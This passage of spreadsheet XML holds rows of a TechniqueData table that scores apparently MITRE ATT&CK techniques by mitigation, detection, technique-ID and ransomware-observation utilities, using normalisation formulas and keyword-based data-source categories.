        <f t="array" ref="AM535">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD535)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN535" s="37">
        <v>0</v>
      </c>
      <c r="AO535" s="37">
        <v>0</v>
      </c>
      <c r="AP535" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ535" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.416666666666664</v>
      </c>
      <c r="AR535" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS535" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT535" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU53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36" spans="1:47" ht="17">
      <c r="A536" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B536" s="37">
        <f t="shared" si="8"/>
        <v>370.04047619047617</v>
      </c>
      <c r="C536" s="37" t="s">
        <v>1828</v>
      </c>
      <c r="D536" s="50" t="s">
        <v>1822</v>
      </c>
      <c r="E536" s="37" t="s">
        <v>569</v>
      </c>
      <c r="F536" s="37">
        <v>0</v>
      </c>
      <c r="G536" s="37">
        <v>1</v>
      </c>
      <c r="H536" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I536" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J536" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K536" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L536" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M536" s="37">
        <v>0</v>
      </c>
      <c r="N536" s="56">
        <v>0</v>
      </c>
      <c r="O536" s="56">
        <v>0</v>
      </c>
      <c r="P536" s="56">
        <v>0</v>
      </c>
      <c r="Q536" s="56">
        <v>26</v>
      </c>
      <c r="R536" s="57"/>
      <c r="S536" s="57"/>
      <c r="T536" s="57"/>
      <c r="U536" s="57"/>
      <c r="V536" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.12380952380952381</v>
      </c>
      <c r="W536" s="37">
        <v>0</v>
      </c>
      <c r="X536" s="37">
        <v>0</v>
      </c>
      <c r="Y536" s="37">
        <v>0</v>
      </c>
      <c r="Z536" s="37">
        <v>26</v>
      </c>
      <c r="AA536" s="37">
        <v>0.26</v>
      </c>
      <c r="AB536" s="37">
        <v>0.26</v>
      </c>
      <c r="AC536" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD536" s="50"/>
      <c r="AE536" s="37" t="str" cm="1">
        <f t="array" ref="AE536">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD536)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF536" s="37">
        <v>532</v>
      </c>
      <c r="AG536" s="37" t="str" cm="1">
        <f t="array" ref="AG536">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD536)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH536" s="37">
        <v>532</v>
      </c>
      <c r="AI536" s="37" t="str" cm="1">
        <f t="array" ref="AI536">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD536)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ536" s="37">
        <v>532</v>
      </c>
      <c r="AK536" s="37" t="str" cm="1">
        <f t="array" ref="AK536">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD536)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL536" s="37">
        <v>532</v>
      </c>
      <c r="AM536" s="37" t="str" cm="1">
        <f t="array" ref="AM536">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD536)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN536" s="37">
        <v>0</v>
      </c>
      <c r="AO536" s="37"/>
      <c r="AP536" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ536" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>123.34682539682539</v>
      </c>
      <c r="AR536" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS536" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT536" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU53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37" spans="1:47" ht="34">
      <c r="A537" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B537" s="37">
        <f t="shared" si="8"/>
        <v>106.65</v>
      </c>
      <c r="C537" s="37" t="s">
        <v>1829</v>
      </c>
      <c r="D537" s="50" t="s">
        <v>1830</v>
      </c>
      <c r="E537" s="37"/>
      <c r="F537" s="37">
        <v>0</v>
      </c>
      <c r="G537" s="37">
        <v>1</v>
      </c>
      <c r="H537" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I537" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J537" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K537" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L537" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M537" s="37">
        <v>0</v>
      </c>
      <c r="N537" s="56">
        <v>0</v>
      </c>
      <c r="O537" s="56">
        <v>0</v>
      </c>
      <c r="P537" s="56">
        <v>0</v>
      </c>
      <c r="Q537" s="56">
        <v>0</v>
      </c>
      <c r="R537" s="57"/>
      <c r="S537" s="57">
        <v>0</v>
      </c>
      <c r="T537" s="57"/>
      <c r="U537" s="57">
        <v>0</v>
      </c>
      <c r="V537" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W537" s="37">
        <v>0</v>
      </c>
      <c r="X537" s="37">
        <v>0</v>
      </c>
      <c r="Y537" s="37">
        <v>0</v>
      </c>
      <c r="Z537" s="37">
        <v>0</v>
      </c>
      <c r="AA537" s="37">
        <v>0</v>
      </c>
      <c r="AB537" s="37">
        <v>0</v>
      </c>
      <c r="AC537" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD537" s="50" t="s">
        <v>1823</v>
      </c>
      <c r="AE537" s="37" t="str" cm="1">
        <f t="array" ref="AE537">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD537)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF537" s="37">
        <v>533</v>
      </c>
      <c r="AG537" s="37" t="str" cm="1">
        <f t="array" ref="AG537">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD537)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH537" s="37">
        <v>533</v>
      </c>
      <c r="AI537" s="37" t="str" cm="1">
        <f t="array" ref="AI537">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD537)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ537" s="37">
        <v>533</v>
      </c>
      <c r="AK537" s="37" t="str" cm="1">
        <f t="array" ref="AK537">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD537)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL537" s="37">
        <v>533</v>
      </c>
      <c r="AM537" s="37" t="str" cm="1">
        <f t="array" ref="AM537">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD537)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN537" s="37">
        <v>0</v>
      </c>
      <c r="AO537" s="37">
        <v>0</v>
      </c>
      <c r="AP537" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ537" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.550000000000004</v>
      </c>
      <c r="AR537" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS537" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT537" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU53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38" spans="1:47" ht="34">
      <c r="A538" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B538" s="37">
        <f t="shared" si="8"/>
        <v>106.85000000000001</v>
      </c>
      <c r="C538" s="37" t="s">
        <v>1831</v>
      </c>
      <c r="D538" s="50" t="s">
        <v>1830</v>
      </c>
      <c r="E538" s="37" t="s">
        <v>1825</v>
      </c>
      <c r="F538" s="37">
        <v>0</v>
      </c>
      <c r="G538" s="37">
        <v>1</v>
      </c>
      <c r="H538" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I538" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J538" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K538" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L538" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M538" s="37">
        <v>0</v>
      </c>
      <c r="N538" s="56">
        <v>0</v>
      </c>
      <c r="O538" s="56">
        <v>0</v>
      </c>
      <c r="P538" s="56">
        <v>0</v>
      </c>
      <c r="Q538" s="56">
        <v>0</v>
      </c>
      <c r="R538" s="57"/>
      <c r="S538" s="57">
        <v>0</v>
      </c>
      <c r="T538" s="57"/>
      <c r="U538" s="57">
        <v>0</v>
      </c>
      <c r="V538" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W538" s="37">
        <v>0</v>
      </c>
      <c r="X538" s="37">
        <v>0</v>
      </c>
      <c r="Y538" s="37">
        <v>0</v>
      </c>
      <c r="Z538" s="37">
        <v>0</v>
      </c>
      <c r="AA538" s="37">
        <v>0</v>
      </c>
      <c r="AB538" s="37">
        <v>0</v>
      </c>
      <c r="AC538" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD538" s="50" t="s">
        <v>1823</v>
      </c>
      <c r="AE538" s="37" t="str" cm="1">
        <f t="array" ref="AE538">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD538)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF538" s="37">
        <v>534</v>
      </c>
      <c r="AG538" s="37" t="str" cm="1">
        <f t="array" ref="AG538">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD538)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH538" s="37">
        <v>534</v>
      </c>
      <c r="AI538" s="37" t="str" cm="1">
        <f t="array" ref="AI538">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD538)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ538" s="37">
        <v>534</v>
      </c>
      <c r="AK538" s="37" t="str" cm="1">
        <f t="array" ref="AK538">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD538)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL538" s="37">
        <v>534</v>
      </c>
      <c r="AM538" s="37" t="str" cm="1">
        <f t="array" ref="AM538">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD538)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN538" s="37">
        <v>0</v>
      </c>
      <c r="AO538" s="37">
        <v>0</v>
      </c>
      <c r="AP538" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ538" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.616666666666667</v>
      </c>
      <c r="AR538" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS538" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT538" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU53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39" spans="1:47" ht="17">
      <c r="A539" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B539" s="37">
        <f t="shared" si="8"/>
        <v>107.05000000000001</v>
      </c>
      <c r="C539" s="37" t="s">
        <v>1832</v>
      </c>
      <c r="D539" s="50" t="s">
        <v>1830</v>
      </c>
      <c r="E539" s="37" t="s">
        <v>1827</v>
      </c>
      <c r="F539" s="37">
        <v>0</v>
      </c>
      <c r="G539" s="37">
        <v>1</v>
      </c>
      <c r="H539" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I539" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J539" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K539" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L539" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M539" s="37">
        <v>0</v>
      </c>
      <c r="N539" s="56">
        <v>0</v>
      </c>
      <c r="O539" s="56">
        <v>0</v>
      </c>
      <c r="P539" s="56">
        <v>0</v>
      </c>
      <c r="Q539" s="56">
        <v>0</v>
      </c>
      <c r="R539" s="57"/>
      <c r="S539" s="57">
        <v>0</v>
      </c>
      <c r="T539" s="57"/>
      <c r="U539" s="57">
        <v>0</v>
      </c>
      <c r="V539" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W539" s="37">
        <v>0</v>
      </c>
      <c r="X539" s="37">
        <v>0</v>
      </c>
      <c r="Y539" s="37">
        <v>0</v>
      </c>
      <c r="Z539" s="37">
        <v>0</v>
      </c>
      <c r="AA539" s="37">
        <v>0</v>
      </c>
      <c r="AB539" s="37">
        <v>0</v>
      </c>
      <c r="AC539" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD539" s="50"/>
      <c r="AE539" s="37" t="str" cm="1">
        <f t="array" ref="AE539">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD539)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF539" s="37">
        <v>535</v>
      </c>
      <c r="AG539" s="37" t="str" cm="1">
        <f t="array" ref="AG539">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD539)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH539" s="37">
        <v>535</v>
      </c>
      <c r="AI539" s="37" t="str" cm="1">
        <f t="array" ref="AI539">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD539)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ539" s="37">
        <v>535</v>
      </c>
      <c r="AK539" s="37" t="str" cm="1">
        <f t="array" ref="AK539">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD539)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL539" s="37">
        <v>535</v>
      </c>
      <c r="AM539" s="37" t="str" cm="1">
        <f t="array" ref="AM539">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD539)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN539" s="37">
        <v>0</v>
      </c>
      <c r="AO539" s="37">
        <v>0</v>
      </c>
      <c r="AP539" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ539" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.683333333333337</v>
      </c>
      <c r="AR539" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS539" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT539" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU53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40" spans="1:47" ht="17">
      <c r="A540" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B540" s="37">
        <f t="shared" si="8"/>
        <v>158.32142857142858</v>
      </c>
      <c r="C540" s="37" t="s">
        <v>1833</v>
      </c>
      <c r="D540" s="50" t="s">
        <v>1830</v>
      </c>
      <c r="E540" s="37" t="s">
        <v>569</v>
      </c>
      <c r="F540" s="37">
        <v>0</v>
      </c>
      <c r="G540" s="37">
        <v>1</v>
      </c>
      <c r="H540" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I540" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J540" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K540" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L540" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M540" s="37">
        <v>0</v>
      </c>
      <c r="N540" s="56">
        <v>0</v>
      </c>
      <c r="O540" s="56">
        <v>5</v>
      </c>
      <c r="P540" s="56">
        <v>0</v>
      </c>
      <c r="Q540" s="56">
        <v>0</v>
      </c>
      <c r="R540" s="57"/>
      <c r="S540" s="57"/>
      <c r="T540" s="57"/>
      <c r="U540" s="57"/>
      <c r="V540" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W540" s="37">
        <v>0</v>
      </c>
      <c r="X540" s="37">
        <v>0</v>
      </c>
      <c r="Y540" s="37">
        <v>0</v>
      </c>
      <c r="Z540" s="37">
        <v>5</v>
      </c>
      <c r="AA540" s="37">
        <v>0.05</v>
      </c>
      <c r="AB540" s="37">
        <v>0.05</v>
      </c>
      <c r="AC540" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD540" s="50"/>
      <c r="AE540" s="37" t="str" cm="1">
        <f t="array" ref="AE540">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD540)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF540" s="37">
        <v>536</v>
      </c>
      <c r="AG540" s="37" t="str" cm="1">
        <f t="array" ref="AG540">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD540)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH540" s="37">
        <v>536</v>
      </c>
      <c r="AI540" s="37" t="str" cm="1">
        <f t="array" ref="AI540">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD540)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ540" s="37">
        <v>536</v>
      </c>
      <c r="AK540" s="37" t="str" cm="1">
        <f t="array" ref="AK540">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD540)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL540" s="37">
        <v>536</v>
      </c>
      <c r="AM540" s="37" t="str" cm="1">
        <f t="array" ref="AM540">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD540)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN540" s="37">
        <v>0</v>
      </c>
      <c r="AO540" s="37"/>
      <c r="AP540" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ540" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>52.773809523809526</v>
      </c>
      <c r="AR540" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS540" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT540" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU54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41" spans="1:47" ht="51">
      <c r="A541" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B541" s="37">
        <f t="shared" si="8"/>
        <v>209.78333333333333</v>
      </c>
      <c r="C541" s="37" t="s">
        <v>1834</v>
      </c>
      <c r="D541" s="50" t="s">
        <v>1835</v>
      </c>
      <c r="E541" s="37"/>
      <c r="F541" s="37">
